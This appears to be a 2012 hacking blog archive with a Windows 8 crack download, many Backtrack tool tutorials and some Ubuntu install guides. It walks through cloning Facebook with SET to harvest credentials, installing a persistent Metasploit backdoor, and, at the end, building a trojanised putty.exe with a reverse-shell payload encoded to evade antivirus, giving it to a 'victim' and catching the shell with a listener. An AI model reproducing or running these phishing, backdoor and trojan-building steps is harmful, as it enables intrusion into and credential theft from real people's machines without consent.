Saturday, 24 November 2012

Download Windows 8 Crack

 

 

 

 


Working in :

windows 8 pro (32 bit)

windows 8 pro (64 bit)

windows 8  Enterprise (32 bit)

windows 8  Enterprise (64 bit)

Windows 8 RT

Download :

Windows 8 Crack

How to Use Whatweb Tool in Backtrack 5 R3

Use this online version of the WhatWeb tool to fingerprint your web application, web server and other technologies of a web page. The tool examines the web server HTTP Headers and the HTML source of a web page to determine what a site is powered by.

Content management systems (CMS), blog technologies, analytics packages, javascript libraries, web server versions are just some of the technologies that can be identified with WhatWeb. When you visit a web address in your browser the raw source has many unseen pointers about the server and software that is running on the web site. WhatWeb parses this code and identifies known technologies.

For More Information Click Here

Mozilla Firefox 11 Bootstrapped Addon Social Engineering Code Execution in Windows



Description:

For More Information Click Here

Honeypot in Backtrack 5 R3



Description:

Download Pentbox Toolkit

For More Information Click Here

GUI Password Hash Cracker for MD5, SHA, NTLM in Backtrack 5 R3

Description:

Download Hash Cracker jar

iCrack.py - MD5 Hash Online and Offline Cracker in Backtrack 5 R3



Download Icrack Script

DNS Information Gathering With DNSENUM in Backtrack 5 R3



Description:

For More Information about Dnsenum tool Click Here

Hack any Email id Using Web Jacking Attack in Backtrack 5 R3



Description:

Web Jacking Attack

For More Information Click Here

 

Extracts Ip Address,Hosts and Subdomins Using Goohost Script in Backtract 5 R3



Description:

Download Goohost Script

For More Information Click Here

Firefox 8/9 AttributeChildRemoved() Use-After-Free Vulnerability



Description:

More Information

For More Information Click Here

Config Arachni Scanner in Backtrack 5 R3



Description:

Download Arachni Scanner

For More Information Click Here

ipv6 DDOS Attack On Windows 7 Using Backtrack 5 R3


A remote attacker can exploit this issue to make affected computers and devices unresponsive, denying service to legitimate users.


Encryption Wizard in Backtrack 5 R3

Encryption Wizard (EW) is a simple, strong, Java file and folder encryptor for protection of sensitive information (FOUO, Privacy Act, CUI, etc.). EW encrypts all file types for data-at-rest and data-in-transit protection. Without installation or elevated privileges.EW offers 128-bit AES encryption, SHA-256 hashing, searchable metadata, archives, compression, secure deleting, and PKI/CAC/PIV support.


JavaScript Keylogger in Backtrack 5 R3



Description:

For More Information Click Here

Crack SSH Using Medusa in Backbox



Description:

For More Information Click Here

 

Viper FakeUpdate Script in Backtrack 5 R3



Description:

Download Viper FakeUpdate Script

For More Information Click Here

 

WebSploit Framework - Java Applet Attack in Backtrack 5 R3



Description:

For More Information Click Here

WebSploit Framework - Browser autopwn in Backtrack 5 R3



Description:

For More Information Click Here

How Can U Create Wordlist in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/Cwl6S

How to Change Hostname in Backtrack 5 R3



Description:

For More Information Click Here

Friday, 23 November 2012

Advanced Googling with Site Operators



Description:

For More Information go to - http://adf.ly/Cwl6S

Advanced Googling with Intitle Operator



 

Description:

For More Information go to - http://adf.ly/FBozH

Advanced Googling with Author and Filetype Operators



Description:

For More Information go to - http://adf.ly/FBofo

Advanced Googling with Allinanchor,Allintext and Allintitle Operators



Description:

For More Information go to - http://adf.ly/FBo4x

How to Use Tor in Backtrack 5 R3 Whole System Using Proxychains



Description:

How to Install Tor and Polipo in Backtrack 5 - http://adf.ly/EMA78
For More Information go to - http://adf.ly/FBnVW

 

How to install Tor and Polipo in Backtrack 5 R3



Description:

Installation Guide - http://adf.ly/BXUie
Download Config File - http://adf.ly/BLYu5

For More Information go to - http://adf.ly/EMA78

Joomscan Tool - Find Vulnerability in Joomla in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/FBn0r

Plecost Tool - WordPress Fingerprinting in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/FBmoQ

Dnstracer Tool in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/FBmez

Honeyd Honeypot in Backtrack 5 R3



Description:

Script :
create default
set default default tcp action block
set default default udp action block
set default default icmp action block

create windows
set windows personality "Microsoft Windows XP Professional SP1"
set windows default tcp action reset
add windows tcp port 135 open
add windows tcp port 139 open
add windows tcp port 445 open

set windows ethernet "00:00:24:ab:8c:12"
dhcp windows on eth0

For More Information go to - http://adf.ly/FBlza

How to Install Beef(Browser Exploitation Framework) in Backtrack 5 R3



Description:

Download Beef Installer Script
For More Information go to - http://adf.ly/FBlgb

Domain Name Type Tool - URLCrazy in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/FBlSd

Ghost Phisher tool - Phishing & Penetration Attack in Backtrak 5 R3



Description:

Download Ghost Phisher tool
For More Information go to - http://adf.ly/FBlBB

Bozocrack.rb MD5 Hash Cracker tool in Backtrack 5 R3

Description:

Download Bozocrack.rb Script

Dnsspoofing Using Ettercap in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/FBkfF

Crack SSH Password Using Hydra in Backtrack 5 R3



Description:

For More Information go to - http://adf.ly/FBkOf

Man in the Middle Attack Using sslstrip



Description:

Download Backtrack 5 - http://adf.ly/5vf7A
For More Information go to - http://adf.ly/FBk8H

Bypass Windows 7 and Windows Xp Administrator Password



Description:

Download Konboot
For More Information go to - http://adf.ly/FBUBL

BrowserAutoPwn Using Metasploit in Backtrack 5 R3



Description:

Download Backtrack 5
Download Metasploit

For More Information go to - http://adf.ly/FBTph

A Memory Corruption Flaw Exists In Microsoft Internet Explorer 8



Description:

Download Backtrack 5
Download Metasploit
For More Information go to - http://adf.ly/FBTTM

How to Install Wallch Wallpaper Changer in Ubuntu 12.04



Description:

Commands :
sudo add-apt-repository ppa:wallch/version-3-ppa
sudo apt-get update
sudo apt-get install wallch

For More Information go to - http://adf.ly/FBT38

How to install Tor in Ubuntu 12.04



Description:

Commands :
sudo add-apt-repository ppa:upubuntu-com/tor
sudo apt-get update
sudo apt-get install tor-browser

For 64bit system

sudo add-apt-repository ppa:upubuntu-com/tor64
sudo apt-get update
sudo apt-get install tor-browser

For More Information go to - http://adf.ly/FBSjd

How to Install SlideWall Live Wallpapers App in Ubuntu 12.04



Description:

Commands :
sudo add-apt-repository ppa:fioan89/slidewall
sudo apt-get update
sudo apt-get install slidewall

For More Information go to - http://adf.ly/FBR2z

How to install Nessus Vulnerability Scanner in Ubuntu 12.04



Description:

Download Nessus - http://adf.ly/E8Hme

For More Information go to - http://adf.ly/FBQky

How to install Metasploit in Ubuntu 12.04



Description:

Download Metasploit

For More Information go to - http://adf.ly/FBQUE

How to install Dock and Gadgets in Ubuntu 12.04



Description:

For More Information go to - http://adf.ly/FBQ2q

How to Install Deepin Software Center in Ubuntu 12.04



Description:

Commands :
sudo add-apt-repository ppa:noobslab/deepin-sc
sudo apt-get update
sudo apt-get install deepin-software-center

For More Information go to - http://adf.ly/FBPbL

How to install Animted Background in Ubuntu 12.04



Description:

Download Link - http://adf.ly/E8HBY

For More Information go to - http://adf.ly/FBPRM

How to Install Aircrack-ng in Ubuntu 12.04



Description:

commands
1 - sudo apt-get install build-essential
2 - sudo apt-get install libssl-dev
3 - wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
4 - In the aircrack-ng-1.1 directory there is a file called common.mak,
use your favorite editor to open the file and scroll down till you see the following line :
CFLAGS ?= -g -W -Wall -Werror -O3
Delete the -Werror variable,
so that the line now looks like the following.
CFLAGS ?= -g -W -Wall -O3
Save and exit.

3 - make
4 - make install

For More Information go to - http://adf.ly/FBNMH

Installing Network Security Toolkit in Vmware



 

Description:

Download Network Security Toolkit ISO File

For More Information go to - http://adf.ly/FBMfs

Installing Android Using Android SDK Manager in Windows 7



Description :

Download java 7
Download Android SDK Manager

For More Information go to - http://adf.ly/FBMHI

How to Hack Windows XP Using Metasploit in Backtrack 5 R3

How to Hack Windows 7 Using Java Applet attack in Backtrack 5 R3

 

Sunday, 12 August 2012

Web Jacking Attack Method



The Web Jacking Attack Vector is another phishing technique that can be used in social engineering engagements.Attackers that are using this method are creating a fake website and when the victim opens the link a page appears with the message that the website has moved and they need to click another link.If the victim clicks the link that looks real he will redirected to a fake page.

The social engineering toolkit has already import this kind of attack.So we are going to use the SET in order to implement this method.We are opening SET and we select the option 2 which is the Website Attack Vectors.

We will see a list with the available web attack methods.The attack that we are going to use is of course the Web Jacking Attack so we select option number 6.


In the next menu we have 3 options:

  •     Web Templates
  •     Site Cloner
  •     Custom Import
We will select the site cloner in order to clone the website of our interest.Remember that this type of attack works with the credential harvester method so we need to choose a website that it has username and password fields in order the attack to have success.For this scenario as you can see in the image below we have select to clone Facebook because of its popularity.

Now it is time to send our the link with our IP address to the victim.Lets see what the victim will see if he opens the link.

As you can see a message will appear informing the user that the website has moved to a new location.The link on the message seems valid so any unsuspicious users will click on the link.At that time a new page will load into the victim’s browser which it will be fake and is running on our web server.

If the victim enters his credentials into the fake Facebook page that looks like the real one then we will be able to capture his username and password.The next image is showing that:

- - - - - - - - - - - - - - - - - - - - - - - - - - - -  VIDEO - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 



How to install a backdoor in windows using metasploit


After going through all the hard work of exploiting a system, it's often a good idea to leave yourself an easier way back into the system later. This way, if the service you exploited is down or patched, you can still gain access to the system. This is where Alexander Sotirov's 'metsvc' comes in handy and was recently added to the Metasploit trunk. To read about the original implementation of metsvc, go to http://www.phreedom.org/software/metsvc/

Using this backdoor, you can gain a Meterpreter shell at any point.

One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you  are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.

TUTORIAL VIDEO

Monday, 30 July 2012

How to install Tor in backtrack 5 R2


Tor is an open source Anonymous Internet tool. It protects your personal identification from tracking systems by changing the source IP address frequently. Application will create many virtual tunnels through the tor network.

By default Tor is not integrated in BackTrack 5. Why use Tor on Backtrack ? Normally Tor is used to protect the browsing security but Tor can be used for network scanning tools and other information gathering tools or by student for Educational Purpose.


In this my article i will show you how to install TOR properly on Backtrack . Dont Be Hesitate If You are Unable to Take Advantage of this post . Put YOUR Question with Me I will quickly give your answer .


So Let Us Start
I do not recommend just using TOR for your proxy. It's wise to layer your anonymity (Including your router,  if you're working off a Desktop).


start. Open the Terminal.
step 1. #cd /etc/apt
             #ls

step 2. #vi sources.list
step 3. Press 'i' on your keyboard.
step 4. Add this line at the bottom:  deb http://deb.torproject.org/torproject.org lucid main
step 5. Press ESC, type a colon, type wq and hit enter.
step 6. Run this command: gpg --keyserver keys.gnupg.net --recv 886DDD89
step 7. Run this command: gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
step 8. apt-get update
step 9. apt-get install tor tor-geoipdb
step 10. Download Tor Browser Bundle for Ubuntu (To your desktop). https://www.torproject.org/projects/torbrowser.html.en

step 11. cd Desktop
step 12. Download the architecture-appropriate file above, save it somewhere, then run one of the following two commands to extract the package archive:

tar -xvzf tor-browser-gnu-linux-i686-2.2.37-2-dev-en-US.tar.gz        
or
tor-browser-gnu-linux-i686-2.2.37-2-dev-en-US.tar.gz

step 13. chown -R root:root ./tor-browser_en-US
step 14. Open the folder 'Tor-Browser_en-US"
step 15. Open the file 'start-tor-browser in gedit.
step 16. Find the line:
"if [ "`id -u`" -eq 0 ]; then
        complain "The Tor Browser Bundle should not be run as root.  Exiting."
        exit 1

17. Change to:

        if [ "`id -u`" -eq 1 ]; then
        complain "The Tor Browser Bundle should not be run as root.  Exiting."
        exit 1


now install polipo

18. apt-get install polipo
19. cd /etc/polipo
20. mv config conf-backup.txt
21. copy polipo config
22. vi config
23. Press 'i' on your keyboard.
24. Paste the text you just copied.
25. Press ESC, type a colon, type wq and hit enter.
26. service polipo start
27. service tor start
28. Start tor browser bundle (From the file on your desktop).
     To run the Tor Browser Bundle, execute the start-tor-browser script:
       # ./start-tor-browser

Remember, polipo runs on port 8118, TOR runs on 9050


Be sure to stop both when you need to update anything:


By giving Command Like

1. service tor stop
2. service polipo stop

VIDEO TUTORIAL :

Thursday, 26 July 2012

How to use Credential Harvester Attack Method over Internet


The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Tools : SET TOOL KIT

OS : Backtrack 5

The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in their user credentials, the usernames and passwords will be posted back to your machine and the victim will be redirected back to the legitimate site.

TUTORIAL VIDEO :



Monday, 27 February 2012

How to Share Folder in Backtrack 5 R1 to Make Accessible in Windows


1. Open your terminal (CTRL+ALT+T) and then run this command to create a new directory "share".

mkdir /var/www/share 

2. Change mode for the share folder into 755.

chmod -R 755 /var/www/share/ 

3. Change the ownership of that folder into www-data.

chown -R www-data:www-data /var/www/share/

5. Okay, everything we've set up correctly until this step. The next step is activate the apache server by running the service apache2 start command :

root@bt:~# service apache2 start 
* Starting web server apache2

if you didn't have apache2 installed, run
 apt-get install apache2 command

                                                              - - - - - VIDEO - - - - -


Guys plz comment and share and like .... thanks
Related post : 
Popular Posts : 

Monday, 9 January 2012

How to bypass internet security using metasploit (Video demonstration include)

How to bypass internet security using msfpayload and mafencode


  • I have posted so many articles on windows hacking using metasploit,using trojan etc,
  • Today i m go no show u hack windows using putty.
  • 1st u must encode putty for bypass antivirus using metasploit and than set payload in putty for connection to victim machine.
  • Now you send this encode putty file send to victim when victim open this tool than payload set connection between attacker machine to victim machine and encode is use for bypass antivirus so antivirus is not detect virus in putty.
  • You got meterpreter shell in your machine in metasploit so you do anythings in u r victim machine using meterpreter shell
  • You install trojan(netcat),u sniffing password (firefox,windows logon etc),u add new user account etc.


You might be interested in some of our other articles:
Requirement:




Steps:

Login to Backtrack machine

root@bt# cd /opt/framework/msf3/

root@bt:/opt/framework/msf3# mkdir work

copy putty.exe to above created work directory

root@bt:/opt/framework/msf3#mv /root/Desktop/putty.exe work/

root@bt:/opt/framework/msf3# msfpayload windows/shell_reverse_tcp LHOST=<your ip> LPORT=80 R | msfencode -t exe -x work/putty.exe -o /root/Desktop/puttyE.exe -e x86/shikata_ga_nai -k -c 5

wait

It will create puttyE.exe on root user desktop and give this puttyE.exe to victim.

After that start listener:

root@bt# msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp

msf exploit(handler) > set LHOST <your ip>

msf exploit(handler) > set LPORT 80

msf exploit(handler) > exploit

Now go to victim machine and open puttyE.exe

you will get access victim machine from backtrack 5 R1:

                                                     - - - - - Video demonstration - - - - -




Related Post :